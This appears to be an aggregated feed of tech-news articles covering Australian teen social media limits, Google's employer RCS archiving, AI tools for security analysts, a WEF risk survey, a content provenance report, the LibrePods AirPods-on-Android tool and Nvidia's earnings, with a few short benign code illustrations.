Government officials have stated that the goal is to reduce children’s exposure to harmful online material, which includes violent content, misogynistic messages, eating disorder promotion, suicide-related material and grooming attempts. A national study reported that the vast majority of children aged 10 to 15 use social media, with many encountering unsafe or damaging content.

Critics, however, warn that age verification tools may misidentify users, create privacy risks or fail to stop determined teenagers from using alternative accounts. Others argue that removing teens from regulated platforms might push them toward unmonitored apps, reducing online safety rather than improving it.

Australian authorities expect challenges in the early weeks of implementation but maintain that the long-term goal is to reduce risks for the youngest generation of online users.



End to End-to-end Encryption? Google Update Allows Firms to Read Employee Texts


Your organization can now read your texts

Microsoft stirred controversy when it revealed a Teams update that could tell your organization when you're not at work. Now Google has done something similar. Say goodbye to end-to-end encryption: with a new Android update covering RCS and SMS, your texts on work-managed devices are no longer private.

According to Android Authority, "Google is rolling out Android RCS Archival on Pixel (and other Android) phones, allowing employers to intercept and archive RCS chats on work-managed devices. In simpler terms, your employer will now be able to read your RCS chats in Google Messages despite end-to-end encryption.”

Only for organizational devices 

This only applies to work-managed devices and doesn't impact personal ones. In regulated industries, it simply adds RCS archiving to existing SMS archiving. Within an organization, however, texting is different from emailing: in texts, employees sometimes share details of their non-work lives. End-to-end encryption kept those conversations private, but that will no longer be the case.

The end-to-end question 

There is a lot of misunderstanding around end-to-end encryption. It protects messages while they are in transit, but once they arrive on your device they are decrypted and no longer covered by that protection.

According to Google, this is "a dependable, Android-supported solution for message archival, which is also backwards compatible with SMS and MMS messages as well. Employees will see a clear notification on their device whenever the archival feature is active.”

What will change?

With this update, getting a phone from work is no longer as good as it seems. Employees have long been wary of over-sharing on email, which is easy to monitor, but texts felt safer.

The update will make things different. According to Google, “this new capability, available on Google Pixel and other compatible Android Enterprise devices gives your employees all the benefits of RCS — like typing indicators, read receipts, and end-to-end encryption between Android devices — while ensuring your organization meets its regulatory requirements.”

Promoting organizational surveillance 

Because of organizational surveillance, employees at times turn to shadow IT apps such as WhatsApp and Signal to communicate with colleagues. The new Google update will only make things worse.

“Earlier,” Google said, “employers had to block the use of RCS entirely to meet these compliance requirements; this update simply allows organizations to support modern messaging — giving employees messaging benefits like high-quality media sharing and typing indicators — while maintaining the same compliance standards that already apply to SMS messaging.”

How Security Teams Can Turn AI Into a Practical Advantage

 



Artificial intelligence is now built into many cybersecurity tools, yet its presence is often hidden. Systems that sort alerts, scan emails, highlight unusual activity, or prioritise vulnerabilities rely on machine learning beneath the surface. These features make work faster, but they rarely explain how their decisions are formed. This creates a challenge for security teams that must rely on the output while still bearing responsibility for the outcome.

Automated systems can recognise patterns, group events, and summarise information, but they cannot understand an organisation’s mission, risk appetite, or ethical guidelines. A model may present a result that is statistically correct yet disconnected from real operational context. This gap between automated reasoning and practical decision-making is why human oversight remains essential.

To manage this, many teams are starting to build or refine small AI-assisted workflows of their own. These lightweight tools do not replace commercial products. Instead, they give analysts a clearer view of how data is processed, what is considered risky, and why certain results appear. Custom workflows also allow professionals to decide what information the system should learn from and how its recommendations should be interpreted. This restores a degree of control in environments where AI often operates silently.

AI can also help remove friction in routine tasks. Analysts often lose time translating a simple question into complex SQL statements, regular expressions, or detailed log queries. AI-based utilities can convert plain language instructions into the correct technical commands, extract relevant logs, and organise the results. When repetitive translation work is reduced, investigators can focus on evaluating evidence and drawing meaningful conclusions.
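As a rough sketch of that idea, the snippet below asks a hosted model to translate an analyst's plain-English question into SQL over a hypothetical events table. The model name, table schema, and prompt wording are assumptions for illustration, and any generated query should still be reviewed before it is run.

    # Hedged sketch: translating a plain-English question into a log query with
    # the OpenAI Python SDK. The model name, "events" table schema, and prompt
    # are illustrative assumptions; review any generated SQL before running it.
    from openai import OpenAI

    client = OpenAI()  # expects OPENAI_API_KEY in the environment

    def to_sql(question: str) -> str:
        response = client.chat.completions.create(
            model="gpt-4o-mini",
            messages=[
                {"role": "system",
                 "content": "Translate the user's question into one SQL query over "
                            "events(timestamp, src_ip, username, action, success). "
                            "Return only the SQL."},
                {"role": "user", "content": question},
            ],
        )
        return response.choices[0].message.content.strip()

    print(to_sql("Show failed logins from 10.0.0.0/8 in the last 24 hours"))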

However, using AI responsibly requires a basic level of technical fluency. Many AI-driven tools rely on Python for integration, automation, and data handling. What once felt intimidating is now more accessible because models can draft most of the code when given a clear instruction. Professionals still need enough understanding to read, adjust, and verify what the model generates. They also need awareness of how AI interprets instructions and where its logic might fail, especially when dealing with vague or incomplete information.

A practical starting point involves a few structured steps. Teams can begin by reviewing their existing tools to see where AI is already active and what decisions it is influencing. Treating AI outputs as suggestions rather than final answers helps reinforce accountability. Choosing one recurring task each week and experimenting with partial automation builds confidence and reduces workload over time. Developing a basic understanding of machine learning concepts makes it easier to anticipate errors and keep automated behaviours aligned with organisational priorities. Finally, engaging with professional communities exposes teams to shared tools, workflows, and insights that accelerate safe adoption.

As AI becomes more common, the goal is not to replace human expertise but to support it. Automated tools can process large datasets and reduce repetitive work, but they cannot interpret context, weigh consequences, or understand the nuance behind security decisions. Cybersecurity remains a field where judgment, experience, and critical thinking matter. When organisations use AI with intention and oversight, it becomes a powerful companion that strengthens investigative speed without compromising professional responsibility.



Global Executives Rank Misinformation, Cyber Insecurity and AI Risks as Top Threats: WEF Survey 2025

 

Business leaders across major global economies are increasingly concerned about the rapid rise of misinformation, cyber threats and the potential negative impacts of artificial intelligence, according to new findings from the World Economic Forum (WEF).

The WEF Executive Opinion Survey 2025, based on responses from 11,000 executives in 116 countries, asked participants to identify the top five risks most likely to affect their nations over the next two years from a list of 34 possible threats.

While economic issues such as inflation and downturns, along with societal challenges like polarization and inadequate public services, remained dominant, technology-driven risks stood out prominently in this year’s results.

Within G20 nations, concerns over AI were especially visible. “Adverse outcomes of AI technologies” emerged as the leading risk in Germany and the fourth most significant in the US. Australian executives similarly flagged “adverse outcomes of frontier technologies,” including quantum innovations, as a top threat.

Misinformation and disinformation ranked as the third-largest concern for executives in the US, UK and Canada. Meanwhile, in India, cyber insecurity—including threats to critical infrastructure—was identified as the number one risk.

Regionally, mis/disinformation ranked second in North America, third in Europe and fourth in East Asia. Cyber insecurity was the third-highest risk in Central Asia, while concerns around harmful AI outcomes placed fourth in South-east Asia.

AI’s influence is clearly woven through most of the technological risks highlighted. The technology is enabling more sophisticated disinformation efforts, including realistic deepfake audio and video. At the same time, AI is heightening cyber risks by empowering threat actors with advanced capabilities in social engineering, reconnaissance, vulnerability analysis and exploit development, according to the UK’s National Cyber Security Centre (NCSC).

The NCSC’s recent threat outlook cautions that AI will “almost certainly” make several stages of cyber intrusion “more effective and efficient” in the next few years.

The survey’s references to “adverse outcomes” of AI also include potential misuse of agentic or generative AI tools and the manipulation of AI models for disruptive, espionage-related or malicious purposes.

A study released in September found that 26% of US and UK organizations experienced a data poisoning attack in the past year, underscoring the growing risks.

“With the rise of AI, the proliferation of misinformation and disinformation is enabling bad actors to operate more broadly,” said Andrew George, president of Marsh Specialty. “As such, the challenges posed by the rapid adoption of AI and associated cyber threats now top boardroom agendas.”

The New Content Provenance Report Will Address GenAI Misinformation


The GenAI problem 

Today's information environment includes a wide range of communication. Social media platforms have enabled reposting and comments, and they are useful for both content consumers and creators, but they bring their own challenges.

The rapid adoption of generative AI has led to a significant increase in misleading content online. These chatbots have a tendency to generate false information with no factual backing.

What is AI slop?

The internet is filling with AI slop: junk content made with minimal human input. There is currently no mechanism to limit the mass production of harmful or misleading content that can impair human cognition and critical thinking. This calls for a robust mechanism that can address the new challenges the current system is failing to tackle.

The content provenance report 

To restore the integrity of digital information, Canada's Centre for Cyber Security (CCCS) and the UK's National Cyber Security Centre (NCSC) have launched a new report on public content provenance. Provenance means "place of origin." To build stronger trust with external audiences, businesses and organisations must improve the way they manage the source of their information.

The NCSC's chief technology officer said the "new publication examines the emerging field of content provenance technologies and offers clear insights using a range of cyber security perspectives on how these risks may be managed."

What is next for Content Integrity?

The industry is implementing a few measures to address content provenance challenges, such as the Coalition for Content Provenance and Authenticity (C2PA). The effort will benefit from the backing of generative AI firms and tech giants like Meta, Google, OpenAI, and Microsoft.

Currently, there is a pressing need for interoperable standards across various media types such as images, video, and text documents. Although content provenance technologies exist, the area is still at a nascent stage.

What is needed?

The main technologies include genuine timestamps and cryptographically verifiable metadata to prove that content hasn't been tampered with. But there are still obstacles in the development of these secure technologies, such as how and when they are applied.
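A toy sketch of that idea follows: bind a content hash and a timestamp together with a keyed signature so that any later edit becomes detectable. This is not the C2PA design, which relies on signed manifests and certificate chains; the key handling and field names below are purely illustrative.

    # Toy sketch of tamper-evident provenance metadata: hash the content, record
    # a timestamp and author, and sign the record. Key handling and field names
    # are illustrative; real schemes (e.g. C2PA) use signed manifests and PKI.
    import hashlib, hmac, json, time

    SIGNING_KEY = b"demo-key"  # real systems use managed keys and certificates

    def make_record(content: bytes, author: str) -> dict:
        record = {
            "author": author,
            "sha256": hashlib.sha256(content).hexdigest(),
            "timestamp": int(time.time()),
        }
        payload = json.dumps(record, sort_keys=True).encode()
        record["signature"] = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
        return record

    def verify(content: bytes, record: dict) -> bool:
        claimed = {k: v for k, v in record.items() if k != "signature"}
        payload = json.dumps(claimed, sort_keys=True).encode()
        expected = hmac.new(SIGNING_KEY, payload, hashlib.sha256).hexdigest()
        return (hmac.compare_digest(record["signature"], expected)
                and record["sha256"] == hashlib.sha256(content).hexdigest())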

Present technology also places the burden on the end user to understand and interpret the provenance data.

A provenance system must allow a user to see who or what made the content, when it was made, and which edits or changes were applied. Threat actors have started using GenAI media to make scams more believable, and it has become difficult to differentiate what is fake from what is real, which is why a mechanism that can track the origin and edit history of digital media is needed. The NCSC and CCCS report will help others navigate this gray area with more clarity.


Indian Teen Enables Apple-Exclusive AirPods Features on Android


Apple's AirPods have long been known for a wide range of intelligent features, such as seamless device switching, adaptive noise control, and detailed battery indicators, but only when paired with an iPhone. Android users, by contrast, have been left with little more than basic audio playback, even though the earbuds themselves connect to Android devices.


That limitation, widely seen as a deliberate reinforcement of Apple's closed ecosystem, is now being challenged by an 18-year-old developer from Gurugram. Kavish Devar's latest creation, LibrePods, is a significant breakthrough: an open-source, completely free tool designed to replicate the AirPods experience on Android, or even Linux, with striking accuracy.

LibrePods removes the restrictions Apple places on AirPods outside its own ecosystem, enabling the earbuds to perform almost identically to the way they do when paired with an iOS device. For Android users who rely on AirPods, the result is a markedly enhanced and more seamless experience, with core functionality, polished integration, and an unexpectedly familiar fluidity.

Earlier community efforts, including OpenPods and MaterialPods, provided limited capabilities such as battery readings, but LibrePods goes much further. With its near-complete control suite, Android users can quickly access functions normally reserved for Apple devices, effectively narrowing a gap that has existed for years.

Devar, a self-taught programmer still in his high school years, developed LibrePods after studying those earlier attempts to improve the experience for Android users, both of which offered only very limited improvements.
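For context, battery readers of this kind generally work by passively listening for the Bluetooth Low Energy status beacons that AirPods broadcast under Apple's manufacturer identifier and decoding battery levels from the payload. The sketch below shows the general shape of that approach in Python with the bleak library; the message-type constant and byte offsets are illustrative assumptions rather than a documented format.

```python
# Rough sketch of the passive battery-reading approach: scan for BLE
# advertisements, pick out Apple's manufacturer-specific data, and decode
# battery nibbles. Offsets and constants are assumptions for illustration.
import asyncio

from bleak import BleakScanner

APPLE_COMPANY_ID = 0x004C   # Apple's Bluetooth SIG company identifier
PROXIMITY_PAIRING = 0x07    # assumed message type for AirPods status beacons


def decode_battery(payload: bytes) -> dict | None:
    if len(payload) < 7 or payload[0] != PROXIMITY_PAIRING:
        return None
    # Hypothetical layout: one nibble per earbud, 0-10 meaning 0-100%,
    # 0xF meaning "unknown".
    left, right = payload[6] >> 4, payload[6] & 0x0F
    return {
        "left_pct": None if left == 0xF else left * 10,
        "right_pct": None if right == 0xF else right * 10,
    }


async def main():
    found = await BleakScanner.discover(timeout=15.0, return_adv=True)
    for address, (_device, adv) in found.items():
        payload = adv.manufacturer_data.get(APPLE_COMPANY_ID)
        if payload and (battery := decode_battery(payload)):
            print(address, battery)


asyncio.run(main())
```

Listening to broadcasts only gets an app so far, which is why LibrePods goes a step further and talks to the earbuds directly as if it were an Apple device, as described below.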

His project takes a much more ambitious approach, according to the detailed notes on its GitHub page: LibrePods is designed to unlock AirPods features that are otherwise exclusive to Apple platforms. These include noise control, adaptive transparency, hearing-assistance functions, ear detection, personalized transparency settings, and precise battery information, all of which are traditionally confined to Apple's ecosystem.

It accomplishes this with an app that emulates the behavior of an authorized Apple endpoint, so an Android device can communicate with AirPods almost exactly as an iPhone would.

The full range of features works best with second- and third-generation AirPods Pro on rooted Android devices running the Xposed framework. OnePlus and Oppo models running OxygenOS 16 or ColorOS 16 can also use LibrePods without rooting, which means Devar has made the tool accessible to a broader range of devices.

Older AirPods models are not as customizable as the newer generations, but they still benefit from accurate battery reporting, which makes the tool worthwhile for anyone who wants reliable battery data.

With these features unlocked, users can switch effortlessly between Noise Cancellation, Adaptive Audio, and Transparency modes, rename their earbuds for easier management, enable automatic play-and-pause, assign long-press actions to toggle ANC or trigger a voice assistant, and use head-gesture controls to answer calls. It is an entirely new way to experience AirPods on Android, bringing the earbuds to a new level of functionality and convenience.

This level of cross-platform functionality was made possible by a meticulous reverse-engineering effort: Devar's code makes AirPods recognize Android handsets as if they were iPhones or iPads. Through this technical trick, the earbuds share the status data and advanced controls that Apple typically confines to its own ecosystem.

LibrePods is not without conditions, however. Owing to what Devar describes as a persistent limitation in the Android Bluetooth stack, the app currently needs to run on a rooted device with the Xposed framework to achieve full functionality.

OnePlus and Oppo smartphones running OxygenOS 16 or ColorOS 16 are a partial exception: they can run the app without rooting, although certain advanced features that require elevated system access, such as fine-tuning the Transparency mode adjustments, remain unavailable on those unrooted devices.

Wide compatibility remains a central priority, with support extending across the AirPods lineup, including AirPods Max and the second- and third-generation AirPods Pro, though older models naturally offer a smaller range of features. Those interested in exploring further will find extensive documentation on the project's GitHub repository, along with the APK to download and install on their own devices.

LibrePods continues to receive widespread attention, and Devar's work reflects a broader shift in how users expect technology to work: with choice, openness, and tools that serve them rather than a platform. In addition to restoring functionality to Android users who had to settle for a diluted AirPods experience, the project demonstrates the power of community-driven innovation in challenging established norms and expectations.

The tool still comes with technical caveats, but its rapid evolution makes further refinements likely. LibrePods therefore points toward a more flexible, multi-platform audio future, one that is user-centric rather than platform-centric.

Nvidia’s Strong Earnings Ease AI Bubble Fears Despite Market Volatility

 

Nvidia (NVDA) delivered a highly anticipated earnings report, and the AI semiconductor leader lived up to expectations.

“These results and commentary should help steady the ship for the AI trade into the end of the year,” Jefferies analysts wrote in a Thursday note.

The company’s late-Wednesday announcement arrived at a critical moment for the broader AI-driven market rally. Over the past few weeks, debate around whether AI valuations have entered bubble territory has intensified, fueled by concerns over massive data-center investments, the durability of AI infrastructure, and uncertainty around commercial adoption.

Thursday’s market swings showed just how unresolved the conversation remains. The Nasdaq Composite surged more than 2% early in the day, only to reverse course and fall nearly 2% by afternoon. Nvidia shares followed a similar pattern—after climbing 5% in the morning, the stock later slipped almost 3%.

Still, Nvidia’s exceptional performance provided some reassurance to investors worried about overheating in the AI sector.

The company reported that quarterly revenue jumped 62% to $57 billion, with expectations for current-quarter sales to reach $65 billion. Margins also improved, and Nvidia projected gross margins would expand further to nearly 75% in the coming quarter.
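As a quick back-of-the-envelope check using only the figures quoted above, the 62% growth rate implies a year-ago quarter of roughly $35 billion, and a ~75% gross margin on the $65 billion guidance would work out to roughly $49 billion in quarterly gross profit.

```python
# Back-of-the-envelope check using the figures quoted above (billions USD).
revenue_q = 57.0        # reported quarterly revenue
growth_yoy = 0.62       # 62% year-over-year growth
guided_revenue = 65.0   # next-quarter revenue guidance
guided_margin = 0.75    # ~75% projected gross margin

year_ago_revenue = revenue_q / (1 + growth_yoy)         # ~35.2
implied_gross_profit = guided_revenue * guided_margin   # ~48.8

print(f"Implied year-ago quarter: ${year_ago_revenue:.1f}B")
print(f"Implied gross profit next quarter: ${implied_gross_profit:.1f}B")
```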

“Bubbles are irrational, with prices rising despite weaker fundamentals. Nvidia’s numbers show that fundamentals are still strong,” said David Russell, Global Head of Market Strategy at TradeStation.

Executives also addressed long-standing questions about AI profitability, return on investment, and the useful life of AI infrastructure during the earnings call.

CEO Jensen Huang highlighted the broad scope of industries adopting Nvidia hardware, pointing to Meta’s (META) rising ad conversions as evidence that “transitioning to generative AI represents substantial revenue gains for hyperscalers.”

CFO Colette Kress also reassured investors about hardware longevity, stating, "Thanks to CUDA, the A100 GPUs we shipped six years ago are still running at full utilization today." Her remarks appeared to indirectly counter claims from hedge fund manager Michael Burry, who recently suggested that tech firms were extending the assumed lifespan of GPUs to downplay data-center costs.

Most analysts responded positively to the report.

“On these numbers, it is very hard to see how this stock does not keep moving higher from here,” UBS analysts wrote. “Ultimately, the AI infrastructure tide is still rising so fast that all boats will be lifted,” they added.

However, not everyone is convinced that the concerns fueling the AI bubble debate have been resolved.

“The AI bubble debate has never been about whether or not NVIDIA can sell chips,” said Julius Franck, co-founder of Vertus. “Their outstanding results do not address the elephant in the room: will the customers buying all this hardware ever make money from it?”

Others suggested that investor scrutiny may only increase from here.

“Many of the risks now worrying investors, like heavy spending and asset depreciation, are real,” noted TradeStation's Russell. “We may see continued weakness in the shares of companies taking on debt to build data centers, even as the boom continues.”